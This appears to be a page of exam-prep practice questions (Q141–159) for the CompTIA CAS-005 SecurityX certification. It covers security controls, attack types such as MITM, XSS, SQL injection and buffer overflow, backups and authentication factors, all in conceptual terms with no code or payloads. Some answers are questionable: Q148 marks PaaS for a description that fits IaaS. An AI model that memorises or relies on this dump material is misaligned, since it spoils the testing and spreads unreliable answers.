CompTIA CAS-005 SecurityX  Exam Dumps and Practice Test Questions Set 8 Q141-160

Visit here for our full CompTIA CAS-005 SecurityX exam dumps and practice test questions.

Question 141:

 Which type of security control is focused on creating and enforcing policies, procedures, and guidelines within an organization?

A. Technical control
B. Administrative control
C. Physical control
D. Detective control

Answer: B. Administrative control

Explanation:

Technical control: Technical controls are implemented through technology, such as firewalls, intrusion detection systems, antivirus software, encryption, or access control mechanisms. While technical controls enforce security through automated processes, they are limited to what systems can enforce. In the context of policies, technology alone cannot dictate organizational behavior, decision-making, or compliance culture. CAS-005 emphasizes that technical controls are essential for enforcement but must be complemented by administrative and physical controls to create a holistic security posture. For example, a firewall can block unauthorized access, but without administrative policies defining acceptable use and escalation procedures, the organization may still be vulnerable to insider misuse or misconfiguration.

Administrative control: Administrative controls are security measures defined through policies, procedures, standards, and guidelines that dictate how personnel, processes, and technologies operate securely. Examples include security awareness training, incident response procedures, change management policies, and acceptable use policies. CAS-005 underscores that administrative controls are foundational to risk management because they establish expectations, responsibilities, and accountability for human behavior, which is often the weakest link in security. Proper administrative controls reduce the risk of insider threats, social engineering attacks, operational errors, and compliance violations. They provide the framework within which technical and physical controls operate. Effective administrative controls include clearly documented policies, regular training, auditing and monitoring compliance, enforcement mechanisms, and continual improvement through lessons learned. For instance, a policy may mandate multi-factor authentication (MFA), while the technical control (MFA system) enforces it. Administrative controls guide the deployment and proper use of technical tools, ensuring users understand their responsibilities and security procedures.

Physical control: Physical controls protect tangible assets like buildings, equipment, or personnel. Examples include security badges, locks, security cameras, and environmental protections. While physical controls prevent unauthorized access and theft, they do not directly dictate procedural compliance or organizational policy. CAS-005 notes that physical controls complement administrative controls by providing a tangible layer of security but cannot replace policies or procedures that govern human behavior or operational standards.

Detective control: Detective controls identify and alert on security incidents, such as intrusion detection systems, audit logs, or security event monitoring. While detective controls inform administrators of potential policy violations or security breaches, they do not establish rules or guide behavior proactively. CAS-005 emphasizes that detective controls are reactive by nature, identifying events after they occur, whereas administrative controls are proactive and foundational to prevention.

In administrative controls create the organizational framework for security, guiding technical and physical measures. They are the backbone of a mature security program, defining how people and processes interact with technology to maintain confidentiality, integrity, and availability. Administrative controls also ensure regulatory compliance and provide a structured approach to risk management, emphasizing that technology alone cannot secure an organization.

Question 142:

 Which type of attack intercepts and potentially alters communications between two parties without their knowledge?

A. Man-in-the-Middle (MITM)
B. SQL Injection
C. Cross-Site Scripting (XSS)
D. Phishing

Answer: A. Man-in-the-Middle (MITM)

Explanation:

Man-in-the-Middle (MITM): MITM attacks occur when an attacker secretly intercepts communications between two parties, potentially eavesdropping or manipulating data in transit. CAS-005 stresses understanding MITM as a critical confidentiality and integrity threat. Attackers can exploit unencrypted connections, weak authentication, or compromised network nodes to inject malicious commands, capture credentials, or alter transactions. MITM attacks highlight the importance of secure protocols such as TLS/SSL, certificate validation, mutual authentication, and network monitoring. In enterprise environments, MITM can target emails, VPNs, VoIP, or web applications. Preventive measures include strong encryption, certificate pinning, proper key management, and endpoint security. CAS-005 candidates must understand MITM attack vectors, detection strategies, and mitigation through layered security controls.

SQL Injection: SQL injection targets vulnerabilities in database-driven applications, allowing attackers to execute malicious queries to manipulate or exfiltrate data. While SQL injection threatens data integrity and confidentiality, it is application-specific and does not intercept or alter communications between two legitimate parties. CAS-005 differentiates SQL injection as a data-centric attack vector, focusing on input validation, parameterized queries, and secure coding practices to prevent exploitation.

Cross-Site Scripting (XSS): XSS injects scripts into web pages that execute in a user’s browser. XSS can steal cookies, modify content, or perform actions on behalf of users. CAS-005 highlights XSS as a client-side vulnerability, distinct from MITM attacks because it exploits user interactions with web applications rather than intercepting communications in transit. XSS mitigation includes input validation, output encoding, content security policies, and secure coding practices.

Phishing: Phishing manipulates users into disclosing credentials or sensitive information via deceptive messages or websites. CAS-005 emphasizes phishing as a social engineering attack targeting human behavior rather than intercepting communications. Preventive measures include awareness training, email filtering, and multi-factor authentication. Phishing may be a precursor to MITM attacks but is not itself an intercepting attack.

MITM attacks are particularly dangerous because they simultaneously compromise confidentiality and integrity, potentially undetected, making detection and prevention a critical focus in CAS-005.

Question 143:

 Which security principle ensures that sensitive information is only accessible by authorized individuals?

A. Integrity
B. Confidentiality
C. Availability
D. Non-repudiation

Answer: B. Confidentiality

Explanation:

Integrity: Integrity ensures data accuracy, consistency, and protection from unauthorized modification. CAS-005 emphasizes integrity for preventing tampering, but integrity alone does not restrict access to authorized users.

Confidentiality: Confidentiality ensures that sensitive information is accessible only to authorized individuals or systems. CAS-005 identifies confidentiality as a foundational element of the CIA triad. Methods include encryption, access controls, strong authentication, network segmentation, and policy enforcement. Breaches of confidentiality can result from data theft, insider threats, social engineering, or misconfigured systems. Maintaining confidentiality requires both technical controls (encryption, access restrictions) and administrative controls (policies, awareness training). CAS-005 emphasizes that protecting confidentiality is essential for compliance with regulatory requirements like GDPR, HIPAA, and PCI-DSS. Threats to confidentiality must be mitigated with layered defense, including endpoint security, monitoring, network security, and incident response.

Availability: Availability ensures users can access systems and data when needed. While CAS-005 highlights availability as critical, it does not guarantee restricted access to information.

Non-repudiation: Non-repudiation prevents denial of actions, often using digital signatures. CAS-005 stresses non-repudiation for accountability, but it does not control access to sensitive data.

Confidentiality is central to protecting organizational secrets, personal data, and intellectual property. CAS-005 encourages candidates to understand technical and procedural mechanisms to enforce confidentiality while balancing usability and operational needs.

Question 144:

 Which type of attack exploits vulnerabilities in web applications to inject malicious code that executes in a user’s browser?

A. SQL Injection
B. Cross-Site Scripting (XSS)
C. Man-in-the-Middle (MITM)
D. Phishing

Answer: B. Cross-Site Scripting (XSS)

Explanation:

SQL Injection: SQL injection targets databases, executing unauthorized queries via user inputs. CAS-005 emphasizes SQLi as a server-side threat, whereas XSS is client-side. SQLi compromises data integrity and confidentiality but does not execute scripts in a user’s browser.

Cross-Site Scripting (XSS): XSS injects malicious scripts into web pages viewed by users. CAS-005 highlights XSS as a major web application vulnerability affecting confidentiality, integrity, and potentially availability. XSS attacks can be stored (persistent), reflected (non-persistent), or DOM-based, exploiting client-side code execution. Attackers can steal session tokens, manipulate DOM elements, or perform unauthorized actions on behalf of users. Prevention includes input validation, output encoding, secure frameworks, content security policies, and awareness of browser behavior. CAS-005 candidates must understand XSS vectors, mitigation strategies, and the impact on user data confidentiality and trust.

Man-in-the-Middle (MITM): MITM intercepts communications between two parties. While it can complement XSS attacks, MITM operates on network traffic rather than browser-side script execution. CAS-005 differentiates MITM as a transport-level attack versus XSS as a client-side attack.

Phishing: Phishing manipulates human behavior to disclose credentials. CAS-005 emphasizes that phishing is social engineering, not code injection, although phishing can lead users to XSS-vulnerable sites.

XSS is critical in CAS-005 because web applications are prevalent, and client-side attacks can bypass server-side controls. Defense in depth includes secure coding, runtime protections, and user education.

Question 145

 Which type of backup captures only the changes made since the last full backup, optimizing storage while ensuring complete recovery?

A. Full backup
B. Incremental backup
C. Differential backup
D. Snapshot backup

Answer: C. Differential backup

Explanation:

Full backup: A full backup copies all selected files every time, ensuring complete recovery but consuming maximum storage and time. CAS-005 emphasizes full backups as foundational, but differential backups improve efficiency.

Incremental backup: Incremental backups copy only changes since the last backup of any type. They are space-efficient but require all incremental sets plus the last full backup for recovery, increasing restoration complexity. CAS-005 highlights trade-offs in speed, storage, and recovery.

Differential backup: Differential backups copy changes since the last full backup. CAS-005 emphasizes that differential backups strike a balance between storage efficiency and recovery speed. Only the last full backup and the latest differential backup are needed for restoration. Implementation requires monitoring, scheduling, and secure storage to maintain integrity and availability. Differential backups are integral to disaster recovery and business continuity planning.

Snapshot backup: Snapshots capture the state of a system or volume at a specific point in time. CAS-005 notes snapshots are often used for quick rollback but are not substitutes for full or differential backups in long-term recovery strategies.

Differential backups are critical for CAS-005 candidates to understand efficient data protection, recovery planning, and balancing RPO/RTO objectives.

Question 146:

Which type of attack attempts to overwhelm a system or network with excessive traffic, rendering it unavailable to legitimate users?

A. Phishing
B. Denial-of-Service (DoS)
C. SQL Injection
D. Cross-Site Scripting (XSS)

Answer: B. Denial-of-Service (DoS)

Explanation:

Phishing: Phishing attacks exploit human psychology rather than technical vulnerabilities. Attackers send deceptive emails, messages, or links to trick users into divulging credentials, installing malware, or performing actions beneficial to the attacker. While phishing can compromise confidentiality and sometimes integrity, it does not disrupt system availability directly. CAS-005 emphasizes phishing as a social engineering vector, highlighting mitigation through user awareness training, email filtering, multi-factor authentication, and anti-phishing tools. Phishing campaigns can be precursors to other attacks, including DoS, by compromising insider accounts, but by itself, phishing is not a DoS attack.

Denial-of-Service (DoS): DoS attacks are specifically designed to target availability, one of the pillars of the CIA triad. CAS-005 candidates must understand that a DoS attack overwhelms system resources—such as CPU, memory, or network bandwidth—preventing legitimate users from accessing services. Typical vectors include malformed packets, excessive connection requests, or application-level floods. DoS attacks can be launched from a single source, while Distributed Denial-of-Service (DDoS) attacks use multiple compromised systems to amplify the impact. Mitigation strategies include rate limiting, traffic filtering, content delivery networks (CDNs), intrusion prevention systems, and coordination with Internet Service Providers (ISPs). Proper monitoring and incident response plans are critical to detect and remediate DoS attacks promptly. CAS-005 stresses understanding the real-world impact on business continuity, customer trust, and regulatory compliance.

SQL Injection: SQL injection attacks target database-driven applications by injecting malicious SQL queries, enabling attackers to manipulate data, bypass authentication, or exfiltrate sensitive information. CAS-005 categorizes SQLi as a confidentiality and integrity threat, not primarily an availability threat, although poorly handled queries could cause resource exhaustion as a side effect. Preventing SQL injection relies on input validation, parameterized queries, stored procedures, and secure coding practices.

Cross-Site Scripting (XSS): XSS injects scripts into web pages that execute on user browsers, targeting confidentiality and integrity. CAS-005 notes XSS can compromise session tokens, redirect users, or manipulate web content but does not inherently prevent legitimate access to the service itself. XSS attacks require mitigation through secure coding, content security policies, input validation, and browser-side protections.

In DoS attacks are critical for CAS-005 candidates to understand because they directly compromise availability. Designing resilient networks with layered controls, redundancy, and proactive monitoring helps ensure service continuity even under attack conditions.

Question 147:

Which principle of security involves dividing critical tasks among multiple individuals to reduce the risk of fraud or error?

A. Principle of least privilege
B. Separation of duties
C. Defense in depth
D. Mandatory access control

Answer: B. Separation of duties

Explanation:

Principle of least privilege: This principle restricts access rights for users, systems, and processes to the minimum required for their function. CAS-005 emphasizes least privilege to minimize attack surface and limit insider threats. While it reduces risk, it does not explicitly divide responsibilities among multiple individuals.

Separation of duties: Separation of duties (SoD) ensures that critical tasks are distributed across multiple personnel so no single individual has complete control over sensitive operations. CAS-005 highlights SoD as a key administrative control to prevent fraud, errors, or misuse. Examples include financial transaction approvals, code deployment, or access provisioning. Proper implementation requires defining complementary roles, monitoring compliance, auditing, and integrating with access control systems. SoD enhances accountability, integrity, and risk mitigation by ensuring collusion or single-person errors cannot compromise critical processes. CAS-005 candidates must also understand the interplay between SoD and least privilege, role-based access control, and automated auditing systems.

Defense in depth: Defense in depth is a layered security strategy that combines technical, administrative, and physical controls to protect assets. While SoD can be a part of defense in depth, defense in depth is broader and encompasses multiple layers of protection beyond task segregation.

Mandatory access control: MAC enforces access based on labels or classifications. While MAC is strict and limits access, it does not inherently enforce task separation or distribute responsibilities among multiple users. CAS-005 distinguishes MAC as an access control enforcement mechanism, not a procedural fraud mitigation technique.

Separation of duties is essential for CAS-005 candidates to understand because it reduces the likelihood of malicious or accidental compromise, ensures process integrity, and supports compliance frameworks such as SOX or PCI-DSS. Effective SoD policies integrate with RBAC, auditing, monitoring, and technical enforcement to maintain a robust security posture.

Question 148:

 Which cloud service model provides hardware, software, and networking resources while allowing organizations to deploy and manage applications?

A. Infrastructure as a Service (IaaS)
B. Platform as a Service (PaaS)
C. Software as a Service (SaaS)
D. Function as a Service (FaaS)

Answer: B. Platform as a Service (PaaS)

Explanation:

Infrastructure as a Service (IaaS): IaaS provides virtualized hardware, storage, and network resources over the cloud. Organizations maintain control over operating systems, applications, and middleware, allowing flexible deployment but requiring management of security, patches, and configurations. CAS-005 emphasizes IaaS for candidates to understand shared responsibility models, virtualization risks, and security of compute, storage, and networking resources.

Platform as a Service (PaaS): PaaS provides a managed platform including operating systems, development tools, and runtime environments, allowing organizations to deploy and run applications without managing underlying infrastructure. CAS-005 highlights PaaS as reducing administrative overhead while still requiring attention to application security, identity and access management, and compliance. Security responsibilities in PaaS include application logic, authentication, data encryption, and monitoring, while the provider manages platform patching and underlying hardware security. PaaS facilitates rapid development, scalability, and integration with DevOps pipelines. CAS-005 candidates must understand PaaS security implications, including containerization, API security, and isolation of workloads.

Software as a Service (SaaS): SaaS provides complete applications managed by the provider. Users focus on functionality without handling underlying infrastructure or application code. CAS-005 emphasizes SaaS for end-user security considerations like identity management, data protection, and secure configurations, but it does not offer the same level of control as PaaS for application deployment.

Function as a Service (FaaS): FaaS enables event-driven, serverless computing where functions run in response to triggers. CAS-005 notes that while FaaS abstracts infrastructure management, security responsibilities include code integrity, authentication, logging, and monitoring. FaaS is a subset of PaaS but requires developers to consider security of ephemeral execution environments.

PaaS balances control and convenience, allowing organizations to focus on application development while relying on provider-managed platforms. CAS-005 candidates must understand risk management, shared responsibility, encryption, API security, and compliance in PaaS environments.

Question 149

 Which authentication method relies on something a user knows, such as a password or PIN?

A. Knowledge factor
B. Possession factor
C. Inherence factor
D. Location factor

Answer: A. Knowledge factor

Explanation:

Knowledge factor: Knowledge factors are authentication methods based on something the user knows, such as passwords, PINs, or answers to security questions. CAS-005 emphasizes understanding knowledge factors because they are widely used but vulnerable to attacks like phishing, social engineering, or brute-force attacks. Security considerations include enforcing strong passwords, multi-factor authentication, password rotation, and secure storage using hashing algorithms. Knowledge factors remain a foundational element of authentication systems, but they must be combined with other factors to strengthen identity verification.

Possession factor: Possession factors rely on items the user physically possesses, such as smart cards, tokens, or mobile devices. CAS-005 highlights possession factors as complementary to knowledge factors in multi-factor authentication. Possession factors enhance security but do not function alone in this scenario.

Inherence factor: Inherence factors are based on biometrics, including fingerprints, facial recognition, or iris scans. They provide strong authentication but are not the primary example of “something the user knows.” CAS-005 emphasizes inherence factors for high-security contexts but notes privacy and false-positive considerations.

Location factor: Location factors rely on geolocation or network-based context for authentication. CAS-005 covers location as an additional authentication dimension, often used in adaptive or conditional access, but it is not “knowledge-based.”

Knowledge factors are essential in CAS-005 because they form the basis for most legacy authentication systems and remain relevant in multi-factor implementations. Proper implementation ensures confidentiality, prevents unauthorized access, and supports secure enterprise identity management.

Question 150:

Which type of access control assigns permissions based on roles within an organization?

A. Discretionary Access Control (DAC)
B. Mandatory Access Control (MAC)
C. Role-Based Access Control (RBAC)
D. Rule-Based Access Control

Answer: C. Role-Based Access Control (RBAC)

Explanation:

Discretionary Access Control (DAC): DAC allows resource owners to determine access to objects they own. CAS-005 notes DAC is flexible but can lead to inconsistent permissions, accidental exposure, or privilege escalation. It is not role-based; access is individualized per user.

Mandatory Access Control (MAC): MAC enforces strict policies based on labels or classifications. Users cannot modify access permissions. While highly secure, MAC is not inherently role-based and is often used in military or high-security environments. CAS-005 emphasizes MAC for high-assurance systems.

Role-Based Access Control (RBAC): RBAC assigns permissions based on roles defined by job functions. CAS-005 stresses RBAC for managing access at scale, reducing administrative complexity, enforcing least privilege, and ensuring auditability. Roles map to responsibilities, making onboarding and offboarding efficient. Security measures include role definition, segregation of duties, periodic reviews, and integration with authentication systems. RBAC simplifies compliance with regulatory standards and supports automated provisioning, logging, and monitoring.

Rule-Based Access Control: Rule-based controls grant access based on conditions such as time, location, or system state. CAS-005 highlights rule-based access as dynamic, but rules complement RBAC rather than replace role-centric permissions.

RBAC is critical in CAS-005 environments because it enables scalable, auditable, and least-privilege-aligned access management, essential for enterprise security, compliance, and risk reduction.

Question 151:

Which type of attack involves intercepting communications between two parties to eavesdrop, steal information, or manipulate messages?

A. Man-in-the-Middle (MITM)
B. Phishing
C. Cross-Site Scripting (XSS)
D. Denial-of-Service (DoS)

Answer: A. Man-in-the-Middle (MITM)

Explanation:

Man-in-the-Middle (MITM): MITM attacks occur when an attacker secretly intercepts and potentially alters communication between two parties. CAS-005 emphasizes understanding MITM because it threatens confidentiality, integrity, and, in some cases, authentication. MITM can occur over networks, including public Wi-Fi, through ARP poisoning, DNS spoofing, or SSL/TLS stripping. Attackers can eavesdrop on sensitive information such as login credentials, financial data, or personal information, or manipulate messages to inject malicious content. Mitigation strategies include implementing end-to-end encryption, certificate validation, secure protocols (HTTPS, SSH, VPN), intrusion detection systems, network segmentation, and user awareness. CAS-005 candidates must understand how MITM attacks exploit trust relationships in network communications and the importance of cryptographic controls and secure key management to prevent such attacks. Proper logging and anomaly detection can help identify MITM attempts, while proactive measures like certificate pinning and mutual TLS reduce risks in enterprise environments.

Phishing: Phishing is a social engineering attack where attackers trick individuals into revealing credentials or sensitive data through deceptive emails, messages, or websites. CAS-005 highlights phishing as an exploitation of human behavior rather than direct interception of network communication. While phishing can precede MITM attacks by providing credentials, it does not directly involve monitoring or altering data in transit. Mitigation focuses on user awareness, email filtering, domain-based message authentication, reporting mechanisms, and multi-factor authentication.

Cross-Site Scripting (XSS): XSS attacks target web applications by injecting scripts into web pages that execute in users’ browsers. CAS-005 notes XSS impacts confidentiality and integrity of client-side data but does not involve intercepting or altering communications between two parties over a network. Preventive measures include secure coding practices, input validation, output encoding, and content security policies.

Denial-of-Service (DoS): DoS attacks aim to make systems unavailable by overwhelming resources. CAS-005 teaches DoS as an availability threat rather than an interception or manipulation of communications. Mitigation includes traffic filtering, rate limiting, and DDoS protection services.

Understanding MITM attacks in CAS-005 is essential for designing secure network architectures, enforcing encryption, and maintaining trust in communications. End-to-end encryption, proper certificate management, and secure session handling ensure data confidentiality and integrity. Candidates should also recognize advanced MITM techniques, such as SSL stripping, session hijacking, and Wi-Fi spoofing, and implement layered defenses using technical, administrative, and procedural controls.

Question 152:

 Which type of backup copies only the data that has changed since the last backup of any type, minimizing storage requirements and backup time?

A. Full Backup
B. Differential Backup
C. Incremental Backup
D. Snapshot

Answer: C. Incremental Backup

Explanation:

Full Backup: A full backup copies all selected files or systems every time it runs, ensuring a complete recovery set. CAS-005 emphasizes full backups for disaster recovery as they simplify restoration and minimize dependency on multiple backup sets. However, full backups are time-consuming and require significant storage, making them less efficient for frequent backups.

Differential Backup: Differential backups copy all data that has changed since the last full backup. CAS-005 notes differential backups simplify recovery compared to incremental because only the last full backup and the latest differential backup are needed. However, differential backups grow over time and consume more storage than incremental backups.

Incremental Backup: Incremental backups copy only the data that has changed since the last backup of any type, whether full or incremental. CAS-005 emphasizes incremental backups for their efficiency, minimal storage use, and rapid execution. However, restoration requires the last full backup and all subsequent incremental backups, making recovery more complex. Candidates must understand the trade-offs between recovery time objectives (RTO) and storage efficiency. Best practices include regularly combining incremental backups with full backups, testing restoration procedures, and ensuring encryption of backup data for confidentiality. Incremental backups are foundational in enterprise backup strategies, particularly for organizations with large datasets and frequent changes. They reduce network load, storage requirements, and backup window duration while maintaining compliance with data retention policies.

Snapshot: Snapshots capture the state of a system or volume at a specific point in time, providing rapid rollback or recovery. CAS-005 notes snapshots are efficient for operational recovery but may not meet long-term archival needs or comprehensive disaster recovery requirements. Snapshots are typically used alongside full, differential, or incremental backups.

Incremental backups align with CAS-005 objectives by providing efficient, secure, and manageable backup solutions that balance storage, time, and recovery requirements. Candidates must understand backup strategies, encryption, offsite storage, retention policies, and restoration testing to ensure enterprise data resilience.

Question 153:

Which type of attack injects malicious SQL statements into an application to manipulate the backend database?

A. Cross-Site Scripting (XSS)
B. SQL Injection
C. Command Injection
D. Buffer Overflow

Answer: B. SQL Injection

Explanation:

Cross-Site Scripting (XSS): XSS attacks inject scripts into web pages executed by users’ browsers. CAS-005 categorizes XSS as a client-side attack targeting confidentiality and integrity of web sessions. XSS does not directly manipulate backend databases, although it can exfiltrate credentials used in database access. Mitigation includes input validation, output encoding, secure coding practices, and web application firewalls.

SQL Injection: SQL injection (SQLi) targets vulnerabilities in web applications that fail to properly validate input. CAS-005 emphasizes SQLi as a critical attack vector for compromising data integrity and confidentiality. Attackers inject malicious SQL statements to bypass authentication, extract sensitive information, modify records, or even escalate privileges within the database. Mitigation strategies include parameterized queries, prepared statements, stored procedures, rigorous input validation, and principle of least privilege for database accounts. SQLi demonstrates the importance of secure development practices, database hardening, and application security testing. CAS-005 highlights automated scanning, code review, and penetration testing to identify and remediate SQLi vulnerabilities. SQLi attacks have real-world consequences, including financial fraud, data breaches, regulatory penalties, and reputational damage.

Command Injection: Command injection attacks occur when applications improperly pass untrusted input to system-level commands, potentially executing arbitrary code on the host. CAS-005 differentiates command injection as targeting the operating system rather than the database backend. Mitigation requires input validation, proper sanitization, and secure coding practices.

Buffer Overflow: Buffer overflow exploits occur when an application writes more data into a buffer than allocated, overwriting adjacent memory. CAS-005 notes buffer overflows target memory corruption, code execution, or denial of service, distinct from SQLi, which manipulates structured query language in databases. Mitigation involves secure coding, bounds checking, stack protections, and memory safety practices.

Understanding SQL injection is essential for CAS-005 candidates to protect enterprise applications, maintain confidentiality, enforce integrity, and ensure compliance with data security regulations.

Question 154:

Which authentication method verifies identity based on physical traits, such as fingerprints, retina patterns, or voice recognition?

A. Knowledge Factor
B. Possession Factor
C. Inherence Factor
D. Location Factor

Answer: C. Inherence Factor

Explanation:

Knowledge Factor: Knowledge-based authentication uses information the user knows, such as passwords, PINs, or security questions. CAS-005 emphasizes its widespread use but notes vulnerabilities to phishing, social engineering, and brute-force attacks. Knowledge factors are foundational but typically combined with other factors in multi-factor authentication.

Possession Factor: Possession-based authentication relies on physical items, like smart cards, hardware tokens, or mobile authentication devices. CAS-005 highlights possession factors as secure when combined with knowledge or inherence factors but distinct from biometrics.

Inherence Factor: Inherence factors, commonly referred to as biometrics, authenticate users based on inherent physical or behavioral traits, including fingerprints, facial recognition, iris scans, voice patterns, or typing cadence. CAS-005 emphasizes inherence factors for their high assurance of identity verification, particularly in secure enterprise environments. Inherence factors are resistant to password-based attacks and are often part of multi-factor authentication systems, combining knowledge, possession, and inherence for robust security. Candidates must understand biometric enrollment, matching algorithms, false acceptance/rejection rates, privacy considerations, template storage security, and integration with identity management systems. While highly secure, inherence factors are vulnerable to spoofing or replay attacks if not properly implemented. CAS-005 highlights the importance of secure sensor devices, encryption of biometric templates, liveness detection, and logging to detect anomalies.

Location Factor: Location factors authenticate based on geographic or network context, such as IP address or GPS location. CAS-005 recognizes location as an adaptive factor but not inherently based on user traits.

Inherence factors provide strong authentication in CAS-005-aligned security strategies, reinforcing identity assurance while supporting compliance and access control policies.

Question 155:

 Which security control focuses on monitoring systems, networks, or applications to detect potential security incidents?

A. Preventive Control
B. Detective Control
C. Corrective Control
D. Compensating Control

Answer: B. Detective Control

Explanation:

Preventive Control: Preventive controls aim to stop security incidents before they occur. Examples include firewalls, access controls, encryption, and multi-factor authentication. CAS-005 emphasizes preventive measures as the first line of defense but notes that no system is entirely immune, highlighting the need for detective measures.

Detective Control: Detective controls identify, log, and alert administrators to security events, threats, or anomalies. Examples include intrusion detection systems (IDS), security information and event management (SIEM) systems, audit logs, and file integrity monitoring. CAS-005 emphasizes detective controls to enhance situational awareness, support incident response, and provide actionable data for remediation. Detective controls complement preventive controls by providing visibility into attempts to bypass protections. Effective detective controls require proper configuration, correlation of events, continuous monitoring, alert prioritization, and integration with incident response workflows. CAS-005 highlights the importance of aligning detective controls with organizational policies, regulatory compliance, and risk management strategies.

Corrective Control: Corrective controls aim to remediate security incidents after they occur, restoring systems and data to a secure state. Examples include patching, restoring from backups, account revocation, and malware removal. CAS-005 teaches corrective controls as part of the overall security lifecycle but distinct from detection.

Compensating Control: Compensating controls are alternative measures that reduce risk when primary controls cannot be implemented. Examples include using monitoring in place of unavailable encryption or manual processes when automated controls are impractical. CAS-005 notes that compensating controls must be documented, evaluated, and integrated into risk management frameworks.

Detective controls are critical in CAS-005 for identifying attacks, verifying compliance, and supporting forensic investigations. They form a bridge between preventive and corrective controls, enabling timely detection and appropriate response. Candidates must understand how to deploy, monitor, and maintain detective mechanisms to maintain enterprise security posture.

Question 156:

Which type of attack tricks users into providing sensitive information, often by impersonating a trusted entity through email or messaging?

A. Phishing
B. Spear Phishing
C. Whaling
D. Vishing

Answer: A. Phishing

Explanation:

Phishing: Phishing is a social engineering attack where attackers impersonate trusted entities, such as banks, employers, or service providers, to trick users into disclosing sensitive information like usernames, passwords, or financial details. CAS-005 emphasizes phishing as a human-centered threat, demonstrating the importance of user awareness, technical controls, and policy enforcement. Attackers often send mass emails or messages containing malicious links or attachments, exploiting human curiosity, trust, or urgency. Phishing can also serve as an initial step in more complex attacks like malware deployment, credential theft, or lateral network movement. Preventive measures include email filtering, domain authentication protocols (SPF, DKIM, DMARC), web content filtering, endpoint protection, multi-factor authentication, and security awareness training. CAS-005 candidates must understand phishing not only in terms of mechanics but also its impact on confidentiality, integrity, and organizational compliance. Monitoring suspicious activity, reporting procedures, and automated threat intelligence integration enhance defenses against phishing campaigns.

Spear Phishing: Spear phishing is a targeted form of phishing where attackers customize messages to a specific individual or organization. CAS-005 highlights spear phishing for its sophistication; attackers gather intelligence about the target to increase the likelihood of success. Unlike generic phishing, spear phishing requires more reconnaissance but often results in higher success rates. Mitigation involves the same controls as general phishing, but with added focus on personalized user awareness and executive protection strategies. Security teams should perform simulation exercises and monitor for unusual behaviors or attempted account access.

Whaling: Whaling targets high-profile individuals, such as executives or key personnel. CAS-005 recognizes whaling as a specialized social engineering tactic that can lead to significant organizational damage if successful. Whaling attacks often involve well-crafted emails, executive impersonation, and requests for wire transfers or confidential information. Protection involves executive awareness, strict approval procedures for financial actions, and monitoring executive accounts for unusual activity.

Vishing: Vishing involves voice-based social engineering, where attackers call targets pretending to be trusted authorities to extract sensitive information. CAS-005 emphasizes vishing as another human-centric attack vector. Mitigation includes employee training, call verification procedures, and policies prohibiting disclosure of sensitive information over phone lines without authentication.

Phishing and its variations exploit human factors, requiring a combination of technical, administrative, and procedural controls to protect organizational assets. CAS-005 underscores the importance of layered defenses, security culture, and awareness campaigns to reduce susceptibility to these attacks.

Question 157:

 Which protocol provides secure remote access to a network by encrypting all communications over an unsecured connection?

A. Telnet
B. SSH
C. FTP
D. HTTP

Answer: B. SSH

Explanation:

Telnet: Telnet is a legacy protocol used for remote administration but transmits data, including credentials, in plaintext. CAS-005 highlights Telnet as insecure for modern networks because it lacks encryption, leaving sensitive information vulnerable to eavesdropping, MITM attacks, or credential theft. Organizations must avoid Telnet for remote access and replace it with secure alternatives.

SSH: Secure Shell (SSH) is a cryptographic protocol providing secure remote access, encrypting all data transmitted between the client and server. CAS-005 emphasizes SSH as a standard for network administration, file transfers, and secure tunneling. SSH ensures confidentiality, integrity, and authentication using public key cryptography, protecting against eavesdropping and MITM attacks. Candidates must understand key management, secure configurations, disabling weak algorithms, enforcing strong authentication (passwords, keys, multi-factor), and restricting access to authorized users. SSH is integral to enterprise security practices, enabling secure management of devices, servers, and network infrastructure. Proper logging, monitoring, and auditing of SSH sessions are also critical for compliance and incident response.

FTP: File Transfer Protocol (FTP) is used for transferring files but transmits data in plaintext, including credentials. CAS-005 notes FTP’s security weaknesses and recommends SFTP (SSH File Transfer Protocol) or FTPS (FTP over SSL/TLS) as secure alternatives.

HTTP: Hypertext Transfer Protocol (HTTP) is used for web communications and transmits data unencrypted. CAS-005 stresses that unencrypted HTTP exposes sensitive information to interception. HTTPS (HTTP over TLS/SSL) is the secure alternative, providing encryption, authentication, and integrity.

SSH aligns with CAS-005 objectives for secure remote management, enforcing encryption, strong authentication, access control, and compliance, ensuring confidentiality and integrity of network communications.

Question 158:

Which type of attack targets system memory to execute arbitrary code by overflowing a buffer?

A. SQL Injection
B. Buffer Overflow
C. Cross-Site Scripting (XSS)
D. Directory Traversal

Answer: B. Buffer Overflow

Explanation:

SQL Injection: SQL Injection targets application databases by injecting malicious SQL queries. CAS-005 categorizes it as an application-level attack affecting data integrity and confidentiality, but it does not involve memory manipulation. Mitigation focuses on parameterized queries, input validation, and secure coding.

Buffer Overflow: Buffer overflow occurs when data exceeds a buffer’s allocated memory, overwriting adjacent memory and potentially allowing arbitrary code execution. CAS-005 emphasizes buffer overflow as a critical vulnerability affecting availability, integrity, and potentially confidentiality. Attackers exploit poorly coded software to inject shellcode or escalate privileges. Mitigation strategies include bounds checking, safe coding practices, stack canaries, non-executable stacks, address space layout randomization (ASLR), and compiler-based protections. CAS-005 highlights buffer overflow prevention as essential for secure software development, vulnerability management, and endpoint protection.

Cross-Site Scripting (XSS): XSS injects scripts into web pages to execute in a user’s browser, targeting client-side vulnerabilities. CAS-005 categorizes XSS separately from memory exploitation attacks like buffer overflows. Preventive measures include input validation, output encoding, and content security policies.

Directory Traversal: Directory traversal exploits improper input validation to access unauthorized files on a server. CAS-005 highlights it as a file system and path manipulation vulnerability, not a memory corruption vulnerability. Mitigation involves secure coding, input sanitization, and least privilege file system permissions.

Buffer overflows demonstrate the importance of secure coding, memory management, and defensive programming. CAS-005 teaches candidates to recognize these vulnerabilities and implement layered protections to prevent exploitation, maintain integrity, and protect system availability.

Question 159

 Which type of control enforces security policies by automatically preventing unauthorized actions or access?

A. Detective Control
B. Corrective Control
C. Preventive Control
D. Compensating Control

Answer: C. Preventive Control

Explanation:

Detective Control: Detective controls identify and alert on security events. CAS-005 highlights their role in monitoring and incident response but does not prevent incidents from occurring.

Corrective Control: Corrective controls remediate issues after they occur, such as patching vulnerabilities or restoring backups. CAS-005 stresses their importance for recovery but not prevention.

Preventive Control: Preventive controls stop security incidents before they happen. CAS-005 emphasizes technical preventive measures like firewalls, access control lists, encryption, multi-factor authentication, endpoint protection, network segmentation, and secure configurations. Administrative preventive controls include policies, procedures, user training, and security awareness programs. Physical preventive controls include locks, access badges, and surveillance. Effective preventive controls reduce attack surfaces, enforce compliance, and uphold confidentiality, integrity, and availability. CAS-005 teaches candidates to implement layered preventive controls combining technical, administrative, and physical measures.

